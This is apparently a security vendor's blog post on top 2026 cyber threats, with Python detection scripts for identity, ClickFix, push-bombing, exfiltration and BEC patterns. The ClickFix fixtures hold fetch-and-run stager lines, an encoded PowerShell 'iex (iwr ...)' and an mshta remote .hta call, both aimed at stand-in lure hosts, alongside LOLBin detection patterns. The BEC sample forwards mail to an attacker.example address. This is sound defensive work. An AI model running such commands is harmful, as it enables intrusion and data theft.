Top cyber threats to prioritize going into 2026

April 11, 2026 Cyber Trends

In 2026, cyber risk is shifting fast from “malware problems” to identity-first attacks: the entry point is increasingly a valid credential, token, or app consent rather than a dropped binary.

1.  Identity takeover from stolen credentials and tokens

What it looks like: password-spraying, “valid” logins from new geos, session-cookie and refresh-token abuse, access gained without obvious malware. Microsoft reports identity attacks are overwhelmingly password-based and rising, with infostealers feeding credential markets.

Do now: phishing-resistant MFA for all admins and remote access, conditional access with impossible-travel and risk-based blocks, disable legacy auth, shorten session lifetime for high-risk apps, alert on abnormal OAuth consent and token use.
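
The “impossible travel” check above is simple enough to run yourself over exported sign-in logs. The following is an added example, not InfoSight's code or any vendor's detection: it assumes each sign-in has already been geolocated (latitude and longitude of the source IP), uses constructed field names and sample events, and treats anything faster than about 900 km/h between two successful sign-ins more than 100 km apart as implausible. Failed attempts are deliberately excluded so that a password-spray attempt from abroad cannot “teleport” the user's last known location.

```python
"""Impossible-travel detection over sign-in events (added example, not InfoSight's code).

Assumes each sign-in has already been geolocated (lat/lon of the source IP);
field names, thresholds and the sample events below are constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timezone
from math import asin, cos, radians, sin, sqrt

MAX_PLAUSIBLE_KMH = 900.0   # assumption: faster than an airliner is not a human traveller
MIN_SEPARATION_KM = 100.0   # assumption: ignore GeoIP jitter inside one metro area


def haversine_km(lat1, lon1, lat2, lon2):
    """Great-circle distance in kilometres between two lat/lon points."""
    earth_radius_km = 6371.0
    dlat = radians(lat2 - lat1)
    dlon = radians(lon2 - lon1)
    a = sin(dlat / 2) ** 2 + cos(radians(lat1)) * cos(radians(lat2)) * sin(dlon / 2) ** 2
    return 2 * earth_radius_km * asin(sqrt(a))


def find_impossible_travel(events, max_kmh=MAX_PLAUSIBLE_KMH, min_km=MIN_SEPARATION_KM):
    """Return one alert per consecutive pair of successful sign-ins whose implied speed is implausible.

    Only successful sign-ins are compared: a failed spray attempt from abroad must not
    become the user's 'last known location'.
    """
    by_user = defaultdict(list)
    for e in events:
        if e["result"] == "success":
            by_user[e["user"]].append(e)

    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        for prev, cur in zip(evs, evs[1:]):
            km = haversine_km(prev["lat"], prev["lon"], cur["lat"], cur["lon"])
            if km < min_km:
                continue                      # same city, different GeoIP point: not travel
            hours = (cur["ts"] - prev["ts"]).total_seconds() / 3600.0
            speed = km / hours if hours > 0 else float("inf")
            if speed > max_kmh:
                alerts.append({
                    "user": user,
                    "from_ip": prev["ip"], "to_ip": cur["ip"],
                    "km": round(km), "hours": round(hours, 2), "kmh": round(speed),
                })
    return alerts


def _t(hour, minute=0):
    return datetime(2026, 1, 12, hour, minute, tzinfo=timezone.utc)


# Constructed sample: alice signs in from London at 09:00 and "from Singapore" 90 minutes
# later (stolen session or token); bob's London-to-Paris hop is ordinary travel; carol's two
# London sign-ins differ only by GeoIP jitter; the failed spray against alice is ignored.
SAMPLE_EVENTS = [
    {"user": "alice", "ts": _t(9),      "ip": "203.0.113.10", "lat": 51.5074, "lon": -0.1278,  "result": "success"},
    {"user": "alice", "ts": _t(9, 20),  "ip": "198.51.100.9", "lat": 40.7128, "lon": -74.0060, "result": "failure"},
    {"user": "alice", "ts": _t(10, 30), "ip": "192.0.2.77",   "lat": 1.3521,  "lon": 103.8198, "result": "success"},
    {"user": "bob",   "ts": _t(9),      "ip": "203.0.113.11", "lat": 51.5074, "lon": -0.1278,  "result": "success"},
    {"user": "bob",   "ts": _t(14),     "ip": "203.0.113.50", "lat": 48.8566, "lon": 2.3522,   "result": "success"},
    {"user": "carol", "ts": _t(9),      "ip": "203.0.113.12", "lat": 51.5074, "lon": -0.1278,  "result": "success"},
    {"user": "carol", "ts": _t(9, 5),   "ip": "203.0.113.13", "lat": 51.52,   "lon": -0.10,    "result": "success"},
]

if __name__ == "__main__":
    for alert in find_impossible_travel(SAMPLE_EVENTS):
        print(alert)
```

Only alice is flagged: roughly 10,800 km in 90 minutes. Tune the two thresholds against your own population (VPN egress points and mobile carriers are the usual false-positive sources) before wiring this into a conditional access block rather than an alert.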

2.  OAuth device-code phishing and “legit flow” phishing

What it looks like: the attacker starts an OAuth device-code flow, contacts the target out-of-band (a call or chat message) and talks them into entering the code on a genuine Microsoft sign-in page; the resulting access and refresh tokens are issued to the client the attacker controls, so no password or malware is needed. Microsoft's MDDR 2025 documents rapid adoption of this technique late in the year.

Do now: restrict or disable device code flow where feasible, tightly control user app-consent, require admin approval for new OAuth apps, monitor device-code sign-in events and anomalous token refresh, train staff to treat device-code prompts as high risk.
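
Because the victim authenticates on a real Microsoft page, the tell in the logs is not the sign-in page but where the tokens end up. The following is an added example, not InfoSight's code or Microsoft's detection logic: it works over constructed sign-in records whose field names (protocol, interactive, token_type) are assumptions loosely modelled on Entra ID sign-in log fields, and it rates a device-code sign-in by whether its source IP has any interactive sign-in history for that user, then watches for refresh-token use from that same unfamiliar IP.

```python
"""Device-code flow abuse detection over sign-in records (added example, not InfoSight's code).

Field names are constructed and only loosely modelled on Entra ID sign-in logs (which
do record the authentication protocol and whether a sign-in was interactive);
map your own schema onto them before use.
"""
from collections import defaultdict
from datetime import datetime, timezone


def _alert(user, e, severity, reason):
    return {"user": user, "ts": e["ts"].isoformat(), "ip": e["ip"], "app": e["app"],
            "severity": severity, "reason": reason}


def detect_device_code_abuse(events):
    """Flag device-code sign-ins, scoring by whether the source IP has interactive history.

    In a device-code phish the victim authenticates on the genuine Microsoft page, but the
    tokens are issued to the client that started the flow, so the sign-in and the later
    refresh-token use come from the attacker's IP: one the user never signed in from.
    """
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)

    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        known_ips = set()     # IPs with ordinary interactive sign-ins so far
        suspect_ips = set()   # IPs that completed a device-code flow with no such history
        for e in evs:
            if e["protocol"] == "deviceCode":
                if e["ip"] in known_ips:
                    alerts.append(_alert(user, e, "medium", "device-code sign-in from a known IP"))
                else:
                    suspect_ips.add(e["ip"])
                    alerts.append(_alert(user, e, "high",
                                         "device-code sign-in from an IP with no interactive history"))
            elif not e["interactive"] and e["token_type"] == "refreshToken" and e["ip"] in suspect_ips:
                alerts.append(_alert(user, e, "high", "refresh token used from device-code origin IP"))
            elif e["interactive"]:
                known_ips.add(e["ip"])
    return alerts


def _t(day, hour):
    return datetime(2026, 1, day, hour, tzinfo=timezone.utc)


# Constructed sample. alice uses device code legitimately (a CLI login) from her usual
# office address; bob is phished: the flow completes from an address he has never used,
# and three hours later the refresh token is redeemed from that same address.
SAMPLE_EVENTS = [
    {"user": "alice", "ts": _t(5, 9),  "ip": "203.0.113.10", "protocol": "authorizationCode",
     "interactive": True,  "token_type": "none",         "app": "Mail client"},
    {"user": "alice", "ts": _t(6, 10), "ip": "203.0.113.10", "protocol": "deviceCode",
     "interactive": True,  "token_type": "none",         "app": "Cloud CLI"},
    {"user": "bob",   "ts": _t(5, 9),  "ip": "198.51.100.5", "protocol": "authorizationCode",
     "interactive": True,  "token_type": "none",         "app": "Mail client"},
    {"user": "bob",   "ts": _t(6, 11), "ip": "192.0.2.77",   "protocol": "deviceCode",
     "interactive": True,  "token_type": "none",         "app": "Office client"},
    {"user": "bob",   "ts": _t(6, 14), "ip": "192.0.2.77",   "protocol": "none",
     "interactive": False, "token_type": "refreshToken", "app": "Graph API"},
]

if __name__ == "__main__":
    for alert in detect_device_code_abuse(SAMPLE_EVENTS):
        print(alert)
```

alice's CLI login is reported at medium severity (device code is high risk by policy on this page, but the IP is hers); bob's flow and the follow-on token refresh are both high. The response for a high alert is to revoke the user's refresh tokens and re-verify them, not just to watch.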

3.  “Copy-paste to fix” social engineering, ClickFix and FileFix

What it looks like: phishing or malvertising drives users to a lure page that convinces them to run a command themselves, then infostealers or RATs deploy.

Do now: block common LOLBins and script abuse with application control and attack-surface-reduction rules, restrict PowerShell and WSH for non-admin users, alert on suspicious command-lines launched from browser context, isolate high-risk web browsing.
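
The “suspicious command line launched from browser context” alert is concrete enough to show. What follows is an added example, not InfoSight's code or any EDR vendor's rule: it scores constructed process-creation events (modelled on Sysmon Event ID 1 fields: parent image, image, command line) where a browser, or explorer.exe standing in for the Run dialog and the File Explorer address bar, spawns a LOLBin with stager-like arguments. It also base64-decodes a PowerShell -EncodedCommand payload before matching, since the interesting strings in a ClickFix one-liner are usually inside the encoded blob. The binary lists, weights and threshold are assumptions to tune locally.

```python
"""ClickFix/FileFix-style detection over process-creation events (added example, not InfoSight's code).

Event fields are constructed and modelled on Sysmon Event ID 1 / EDR process telemetry
(parent image, image, command line); binary lists, weights and threshold are assumptions.
"""
import base64
import re

# Parents a user drives when pasting a lure: browsers, plus explorer.exe because both the
# Win+R Run dialog and the File Explorer address bar spawn their children under it.
LURE_PARENTS = {"explorer.exe", "chrome.exe", "msedge.exe", "firefox.exe", "brave.exe"}
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "wscript.exe",
           "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe", "msiexec.exe"}

# (pattern, weight, label): indicators typical of a one-line stager; matched against the raw
# command line plus the decoded -EncodedCommand payload, if any.
INDICATORS = [
    (re.compile(r"-(?:e|ec|enc|encodedcommand)\s", re.I),                           2, "encoded command"),
    (re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),                                1, "hidden window"),
    (re.compile(r"\b(?:iex|invoke-expression)\b", re.I),                             2, "invoke-expression"),
    (re.compile(r"\b(?:iwr|invoke-webrequest|downloadstring|curl|wget)\b", re.I),   1, "web download"),
    (re.compile(r"https?://", re.I),                                                  1, "URL in command line"),
    (re.compile(r"-nop\b|-noprofile\b|-ep\s+bypass|executionpolicy\s+bypass", re.I), 1, "policy bypass"),
    (re.compile(r"\bmshta(?:\.exe)?\b.*https?://", re.I),                            3, "mshta launching remote content"),
    (re.compile(r"#.*(?:verify|human|captcha|robot)", re.I),                         2, "fake CAPTCHA comment"),
]
ALERT_THRESHOLD = 3


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload (base64 of UTF-16LE), or '' if none."""
    m = re.search(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", cmdline, re.I)
    if not m:
        return ""
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return ""


def score_event(ev):
    """Score one process-creation event; 0 unless a lure parent spawned a LOLBin."""
    parent = ev["parent_image"].rsplit("\\", 1)[-1].lower()
    image = ev["image"].rsplit("\\", 1)[-1].lower()
    if parent not in LURE_PARENTS or image not in LOLBINS:
        return 0, []
    text = ev["command_line"] + "\n" + decode_encoded_command(ev["command_line"])
    score, hits = 0, []
    for rx, weight, label in INDICATORS:
        if rx.search(text):
            score += weight
            hits.append(label)
    return score, hits


def find_clickfix(events, threshold=ALERT_THRESHOLD):
    alerts = []
    for ev in events:
        score, hits = score_event(ev)
        if score >= threshold:
            alerts.append({"id": ev["id"], "host": ev["host"], "score": score, "hits": hits})
    return alerts


def _ps_encoded(script):
    """Encode a script the way PowerShell expects for -EncodedCommand (used to build the sample)."""
    return base64.b64encode(script.encode("utf-16-le")).decode()


# Constructed sample: 1 is a Run-dialog paste with an encoded stager, 2 is an Edge-spawned
# mshta fetching a remote .hta, 3 is an admin's scripted backup, 4 and 5 are benign noise.
SAMPLE_EVENTS = [
    {"id": 1, "host": "WS-042", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "powershell.exe -nop -w hidden -enc "
                     + _ps_encoded("iex (iwr 'http://lure.example/verify').Content # I am not a robot")},
    {"id": 2, "host": "WS-042", "parent_image": r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "command_line": "mshta.exe https://lure.example/captcha.hta"},
    {"id": 3, "host": "SRV-01", "parent_image": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": r"powershell.exe -File C:\ops\backup.ps1"},
    {"id": 4, "host": "WS-042", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "command_line": r"notepad.exe C:\Users\alice\notes.txt"},
    {"id": 5, "host": "WS-017", "parent_image": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\cmd.exe",
     "command_line": "cmd.exe /c dir"},
]

if __name__ == "__main__":
    for alert in find_clickfix(SAMPLE_EVENTS):
        print(alert)
```

Events 1 and 2 alert; the admin's backup script does not, because its parent is a console, not a lure surface. In production the same parent/child pairing is what an application-control or attack-surface-reduction policy should simply block for non-admin users; the scoring here is for the gap that policy leaves.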

4.  Help desk and support-channel compromise, MFA fatigue, SIM swapping

What it looks like: attackers impersonate employees or IT staff, push-bomb MFA prompts until one is approved, convince carriers to port numbers, and target contracted IT help desks; public reporting on Scattered Spider explicitly documents these TTPs and the group's recent use of ransomware.

Do now: phishing-resistant MFA, number-matching and MFA fatigue protections, hardened help-desk workflows with call-back verification and “no MFA transfer” policy, carrier port-out PINs, strict controls over remote-access tooling and help-desk privileged roles.
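
Number matching removes most of the push-bombing problem, but the burst of rejected prompts is still worth alerting on, and a prompt approved inside such a burst is the case that needs a phone call. The following is an added example, not InfoSight's code or any identity provider's built-in protection: it runs a sliding window over constructed MFA push results (generic user/timestamp/result fields, which are assumptions) and rates a burst of denials high and an approval that follows one critical.

```python
"""MFA push-bombing detection over authentication events (added example, not InfoSight's code).

Records are constructed; the field names are generic (user, ts, result) and the window
and threshold are assumptions to tune against your own baseline.
"""
from collections import defaultdict, deque
from datetime import datetime, timedelta, timezone

WINDOW = timedelta(minutes=10)
DENIED_THRESHOLD = 3     # assumption: three or more rejected pushes in the window


def detect_push_bombing(events, window=WINDOW, threshold=DENIED_THRESHOLD):
    """Return alerts for users receiving repeated rejected pushes in a sliding window.

    A burst of denied or expired pushes is reported once (high). A push *approved* while
    that burst is still inside the window is the fatigue success case (critical).
    """
    by_user = defaultdict(list)
    for e in events:
        by_user[e["user"]].append(e)

    minutes = int(window.total_seconds() // 60)
    alerts = []
    for user, evs in by_user.items():
        evs.sort(key=lambda e: e["ts"])
        recent_denials = deque()      # timestamps of rejected pushes inside the window
        burst_reported = False
        for e in evs:
            while recent_denials and e["ts"] - recent_denials[0] > window:
                recent_denials.popleft()
            if e["result"] in ("denied", "timeout"):
                recent_denials.append(e["ts"])
                if len(recent_denials) >= threshold and not burst_reported:
                    alerts.append({"user": user, "ts": e["ts"].isoformat(), "severity": "high",
                                   "reason": f"{len(recent_denials)} rejected pushes within {minutes} min"})
                    burst_reported = True
            elif e["result"] == "approved":
                if len(recent_denials) >= threshold:
                    alerts.append({"user": user, "ts": e["ts"].isoformat(), "severity": "critical",
                                   "reason": f"push approved after {len(recent_denials)} rejected pushes"})
                recent_denials.clear()
                burst_reported = False
    return alerts


def _t(hour, minute):
    return datetime(2026, 1, 12, hour, minute, tzinfo=timezone.utc)


# Constructed sample: alice rejects five pushes in five minutes and then gives in; bob
# fat-fingers one prompt and approves the retry; carol's denials are 20 minutes apart.
SAMPLE_EVENTS = (
    [{"user": "alice", "ts": _t(9, m), "result": "denied"} for m in range(0, 5)]
    + [{"user": "alice", "ts": _t(9, 5), "result": "approved"}]
    + [{"user": "bob", "ts": _t(9, 0), "result": "denied"},
       {"user": "bob", "ts": _t(9, 1), "result": "approved"}]
    + [{"user": "carol", "ts": _t(8, m), "result": "denied"} for m in (0, 20, 40)]
    + [{"user": "carol", "ts": _t(9, 0), "result": "denied"}]
)

if __name__ == "__main__":
    for alert in detect_push_bombing(SAMPLE_EVENTS):
        print(alert)
```

alice produces a high alert at the third denial and a critical one at the approval; bob and carol produce nothing. The critical case should trigger the same response as a confirmed credential theft: revoke sessions, reset the factor, and verify the user by call-back, not by another push.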

5.  Ransomware and data extortion, including theft-only extortion

What it looks like: data theft first, followed by encryption in some cases and by no encryption at all in others; Microsoft reports extortion or ransomware drives a majority of attacks with known motives, and Mandiant documents data-theft extortion without encryption as a recurring pattern in cloud compromises.

Do now: immutable and offline backups with regular restore testing, egress controls and anomaly detection for bulk exfiltration, rapid privilege-containment playbooks, network segmentation for crown-jewel systems, and treating backup infrastructure as a primary target in its own right: encrypt it and monitor it.
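
“Anomaly detection for bulk exfil” is the control most teams have on paper but not in code. The following is an added example, not InfoSight's code or a product feature: it takes constructed per-host daily outbound byte totals (the kind of aggregate a flow collector or firewall export yields) and flags a day whose volume is far outside the host's own recent baseline using a median/MAD robust z-score, so that one earlier spike cannot inflate the baseline. The 14-day window and the 3.5 cut-off are assumptions; the flat-baseline fallback handles the edge case where MAD is zero and a plain z-score would divide by zero.

```python
"""Bulk-egress anomaly detection per host (added example, not InfoSight's code).

Input is constructed: daily outbound byte totals per host. The median/MAD robust z-score is
a general technique; the 14-day baseline and the 3.5 cut-off are assumptions.
"""
from statistics import median

BASELINE_DAYS = 14
ROBUST_Z_THRESHOLD = 3.5
GB = 1024 ** 3


def robust_z(value, history):
    """z-score using median and MAD so one earlier spike cannot inflate the baseline.

    If MAD is zero (a perfectly flat baseline) fall back to 10% of the median, floored at
    one byte, so a host that always sends exactly the same volume still alerts on a jump
    instead of dividing by zero.
    """
    med = median(history)
    mad = median(abs(x - med) for x in history)
    scale = 1.4826 * mad if mad > 0 else max(0.1 * med, 1.0)
    return (value - med) / scale


def find_bulk_exfil(daily_egress, baseline_days=BASELINE_DAYS, z_threshold=ROBUST_Z_THRESHOLD):
    """daily_egress: {host: [bytes_day1, bytes_day2, ...]} -> alerts for days far above baseline."""
    alerts = []
    for host, series in daily_egress.items():
        for i in range(baseline_days, len(series)):
            history = series[i - baseline_days:i]
            z = robust_z(series[i], history)
            if z > z_threshold:
                alerts.append({"host": host, "day": i + 1, "bytes": round(series[i]),
                               "median_bytes": round(median(history)), "z": round(z, 1)})
    return alerts


# Constructed sample, in GB: a file server that normally sends ~2 GB/day and then 120 GB;
# a build agent with a perfectly flat 0.5 GB/day (MAD == 0) that jumps to 40 GB;
# a workstation with ordinary day-to-day variation.
SAMPLE_DAILY_EGRESS = {
    "fileserver-01": [x * GB for x in
                      [2.0, 2.3, 1.8, 2.1, 2.5, 1.9, 2.2, 2.0, 2.4, 1.7, 2.1, 2.3, 1.9, 2.2, 120.0]],
    "build-agent-07": [0.5 * GB] * 14 + [40.0 * GB],
    "ws-042": [x * GB for x in
               [0.30, 0.28, 0.31, 0.29, 0.32, 0.30, 0.27, 0.31, 0.30, 0.29, 0.33, 0.30, 0.28, 0.31, 0.32]],
}

if __name__ == "__main__":
    for alert in find_bulk_exfil(SAMPLE_DAILY_EGRESS):
        print(alert)
```

Two alerts come out: the file server (z in the hundreds) and the flat-baseline build agent; the workstation stays quiet. Pair the volume signal with destination (new ASN, cloud-storage or paste-site categories) before paging anyone, since the same spike also describes a legitimate backup job.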

6.  Zero-day and n-day exploitation of edge security devices

What it looks like: exploitation of VPNs, firewalls, and other edge appliances that sit internet-facing; Mandiant notes the most frequently exploited vulnerabilities in 2024 IR work hit edge security devices and were often first exploited as zero-days.

Do now: aggressively patch edge devices on a fixed cadence, remove admin interfaces from the internet, enforce MFA on all remote admin, continuous external attack-surface monitoring, rapid IOC sweeps after any vendor alert.

7.  Cloud and SaaS account compromise leading to mass data theft

What it looks like: phishing and stolen credentials as dominant entry points for cloud incidents, followed by data theft as the primary objective; Mandiant quantifies both the entry vectors and the frequency of data theft in cloud compromises.

Do now: tenant-wide MFA enforcement, conditional access, restrict and monitor service principals, least-privilege for SaaS admins, CASB-style monitoring for bulk downloads and API abuse, rotate secrets and remove unused integrations.

8.  Third-party compromise and enterprise app zero-days

What it looks like: compromise via a vendor, managed service, or enterprise platform flaw; recent breach reporting highlights the blast radius of zero-days in widely deployed enterprise software.

Do now: hard vendor access segmentation, time-bound privileged access, continuous assessment of third-party remote tools, rapid patch SLAs for ERP and line-of-business platforms, contractual incident-notification and logging requirements.

9.  Business email compromise and payment diversion fraud

What it looks like: mailbox takeover, invoice manipulation, MFA bypass, and payroll or wire rerouting; Mandiant explicitly tracks BEC as a financially motivated objective in cloud intrusions. 

Do now: enforce DMARC with reject, disable auto-forward to external domains, out-of-band verification for payment changes, protect finance mailboxes with strongest conditional access and MFA, alert on new inbox rules and unusual OAuth grants.
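
The “alert on new inbox rules” control is where most BEC is caught after the fact, because the attacker almost always sets up a rule to hide the conversation they are hijacking. The following is an added example, not InfoSight's code or a mail platform's built-in alert: it triages constructed mailbox-change audit records (an operation name plus a parameter map, roughly the shape of New-InboxRule / Set-Mailbox audit events) for external forwarding, message hiding, finance-keyword filters and throwaway rule names. The internal-domain list, keyword list and folder list are assumptions.

```python
"""Mailbox-rule and forwarding triage for BEC (added example, not InfoSight's code).

Events are constructed in the shape of audit-log records (operation plus a parameter map);
the internal-domain, finance-keyword and hiding-folder lists are assumptions.
"""
INTERNAL_DOMAINS = {"example.com"}      # assumption: your own accepted domains
FINANCE_WORDS = {"invoice", "payment", "wire", "bank", "remit", "ach", "payroll"}
HIDING_FOLDERS = {"rss subscriptions", "rss feeds", "archive", "conversation history", "junk email"}


def _domain(addr):
    """Domain part of an address, tolerating the 'smtp:' prefix some forwarding fields carry."""
    addr = addr.lower()
    if addr.startswith("smtp:"):
        addr = addr[5:]
    return addr.rsplit("@", 1)[-1]


def triage_mailbox_change(ev, internal_domains=INTERNAL_DOMAINS):
    """Return (severity, findings) for one rule/forwarding change; severity None if benign."""
    p = ev["params"]
    findings = []

    targets = list(p.get("ForwardTo", [])) + list(p.get("RedirectTo", [])) \
        + list(p.get("ForwardAsAttachmentTo", []))
    if p.get("ForwardingSmtpAddress"):
        targets.append(p["ForwardingSmtpAddress"])
    external = [t for t in targets if _domain(t) not in internal_domains]
    if external:
        findings.append("forwards to external address: " + ", ".join(external))

    if p.get("DeleteMessage") or p.get("MarkAsRead"):
        findings.append("hides messages (delete or mark as read)")
    folder = p.get("MoveToFolder", "").rsplit("\\", 1)[-1].lower()
    if folder in HIDING_FOLDERS:
        findings.append(f"moves mail to rarely viewed folder '{p['MoveToFolder']}'")

    words = {w.lower() for w in list(p.get("SubjectContainsWords", [])) + list(p.get("BodyContainsWords", []))}
    if words & FINANCE_WORDS:
        findings.append("filters on finance terms: " + ", ".join(sorted(words & FINANCE_WORDS)))

    if ev["operation"] == "New-InboxRule" and len(p.get("Name", "").strip()) <= 2:
        findings.append("rule name is empty or a single character")

    if external or len(findings) >= 2:
        return "high", findings
    return ("medium", findings) if findings else (None, findings)


def triage_all(events):
    """Return [(mailbox, severity, findings)] for every event that is not benign."""
    out = []
    for ev in events:
        severity, findings = triage_mailbox_change(ev)
        if severity:
            out.append((ev["mailbox"], severity, findings))
    return out


# Constructed sample: alice's mailbox gets the classic BEC rule; bob's mailbox is pointed at
# an external address; carol's newsletter rule and dave's internal forward are legitimate.
SAMPLE_EVENTS = [
    {"mailbox": "alice@example.com", "operation": "New-InboxRule",
     "params": {"Name": ".", "SubjectContainsWords": ["invoice", "wire"],
                "MoveToFolder": "Inbox\\RSS Subscriptions", "MarkAsRead": True}},
    {"mailbox": "bob@example.com", "operation": "Set-Mailbox",
     "params": {"ForwardingSmtpAddress": "smtp:bob.finance@mail.attacker.example", "DeliverToMailboxAndForward": True}},
    {"mailbox": "carol@example.com", "operation": "New-InboxRule",
     "params": {"Name": "Team newsletter", "FromAddressContainsWords": ["news"],
                "MoveToFolder": "Inbox\\Newsletters"}},
    {"mailbox": "dave@example.com", "operation": "Set-Mailbox",
     "params": {"ForwardingSmtpAddress": "smtp:dave.shared@example.com"}},
]

if __name__ == "__main__":
    for mailbox, severity, findings in triage_all(SAMPLE_EVENTS):
        print(mailbox, severity, findings)
```

alice's rule (finance keywords, a hiding folder, mark-as-read, a one-character name) and bob's external forward both rate high; carol and dave do not appear. Disabling external auto-forward tenant-wide, as the list above says, turns the bob case from a detection into a hard failure for the attacker; the rule triage still matters because hiding rules need no external forward.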

10.  Insider access and “trusted hire” risk

What it looks like: access obtained through contractor and employee channels; Mandiant reports insider threat spiked as an initial infection vector tied to fraudulent North Korean IT worker placements.

Do now: strengthened hiring identity verification, device attestation for remote workers, privileged access management for all IT roles, strict separation of duties, continuous monitoring of admin actions and data access.

11.  AI-assisted phishing and faster malware development

What it looks like: more convincing lures, rapid variation, automated targeting; Microsoft notes AI is increasing the efficiency of phishing and ransomware operations.

Do now: shift controls from content-based filtering to identity and execution controls, harden authentication and consent flows, deploy behavioral detections for post-compromise actions, run frequent phishing simulations tuned to current attack patterns.

Make a resolution in 2026 to set up a security evaluation with InfoSight to identify your highest-risk exposure paths, validate controls, and get a prioritized remediation plan before attackers do.
